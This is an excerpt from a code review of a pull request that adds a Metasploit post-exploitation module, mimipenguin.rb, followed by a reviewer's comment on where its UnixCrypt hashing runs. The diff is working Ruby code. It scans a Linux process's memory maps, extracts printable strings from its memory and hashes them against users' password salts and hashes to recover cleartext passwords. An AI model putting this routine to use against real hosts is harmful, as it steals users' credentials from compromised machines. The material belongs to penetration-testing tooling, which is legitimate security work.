modules/post/linux/gather/mimipenguin.rb

```diff
@@ -0,0 +1,354 @@
+    mem_data = read_file("/proc/#{pid}/maps")
+    return mem_regions if mem_data.nil?
+
+    lines = mem_data.split("\n")
+    updated_regions = mem_regions.clone
+    if mem_regions.length == 1
+      match_addr = mem_regions[0]['start'].to_s(16)
+      match_ind = lines.index { |line| line.split('-').first.include?(match_addr) }
+      prev = lines[match_ind - 1]
+      if prev && prev.include?('00000000 00:00 0')
+        start_addr, end_addr = format_addresses(prev)
+        length = end_addr - start_addr
+
+        updated_regions << { 'start' => start_addr, 'length' => length }
+      end
+
+      post = lines[match_ind + 1]
+      if post && post.include?('00000000 00:00 0')
+        start_addr, end_addr = format_addresses(post)
+        length = end_addr - start_addr
+
+        updated_regions << { 'start' => start_addr, 'length' => length }
+      end
+
+      return updated_regions
+    end
+
+    mem_regions.each_with_index do |region, index|
+      next if index == 0
+
+      first_addr = mem_regions[index - 1]['start']
+      curr_addr = region['start']
+      first_addr = first_addr.to_s(16)
+      curr_addr = curr_addr.to_s(16)
+      first_index = lines.index { |line| line.start_with?(first_addr) }
+      curr_index = lines.index { |line| line.start_with?(curr_addr) }
+      next if first_index.nil? || curr_index.nil?
+
+      between_vals = lines.values_at(first_index + 1...curr_index)
+      between_vals = between_vals.select { |line| line.include?('00000000 00:00 0') }
+      if between_vals.empty? && !mem_regions.last == region
+        next
+      elsif between_vals.empty? && mem_regions.last == region
+        adj_region = lines[curr_index + 1]
+        return updated_regions if adj_region.nil?
+
+        start_addr, end_addr = format_addresses(adj_region)
+        length = end_addr - start_addr
+        updated_regions << { 'start' => start_addr, 'length' => length }
+        return updated_regions
+      end
+
+      between_vals.each do |addr_line|
+        start_addr, end_addr = format_addresses(addr_line)
+        length = end_addr - start_addr
+        updated_regions << { 'start' => start_addr, 'length' => length }
+      end
+    end
+
+    updated_regions
+  end
+
+  def get_printable_strings(pid, start_addr, section_len)
+    lines = []
+    curr_addr = start_addr
+    max_addr = start_addr + section_len
+
+    while curr_addr < max_addr
+      data = mem_read(pid, curr_addr, 1000)
+      lines << data.split(/[^[:print:]]/)
+      lines = lines.flatten
+      curr_addr += 800
+    end
+
+    lines.reject! { |line| line.length < 4 }
+    lines
+  end
+
+  def check_for_valid_passwords(captured_strings, user_data, process_name)
+    captured_strings.each do |str|
+      user_data.each do |pass_info|
+        salt = pass_info['salt']
+        hash = pass_info['hash']
+        pass_type = pass_info['type']
+        case pass_type
+        when 'md5'
+          hashed = UnixCrypt::MD5.build(str, salt)
```

Comment:
`UnixCrypt` hashing is performed on the Metasploit side, which may not be running on Linux. I'm not sure if it is relevant to this PR, but last time I attempted this (#10224) there were issues with OS-dependent `crypt` implementations. See: https://github.com/rapid7/metasploit-framework/pull/10224#issuecomment-404303788

I worked around this by performing hashing on the target host. This also had the added benefit of removing the requirement to send huge amounts of process memory data back to Metaspoit for processing. However, the implementation was unclean.